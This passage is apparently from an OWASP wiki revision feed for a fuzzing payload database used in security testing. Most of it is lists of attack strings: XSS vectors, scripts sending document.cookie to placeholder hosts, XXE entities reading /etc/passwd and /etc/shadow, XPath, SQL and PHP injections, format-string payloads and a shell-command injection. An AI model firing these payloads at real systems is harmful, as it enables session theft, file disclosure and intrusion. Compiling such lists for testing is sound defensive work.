&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80086</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80086"/>
				<updated>2010-03-17T21:19:48Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
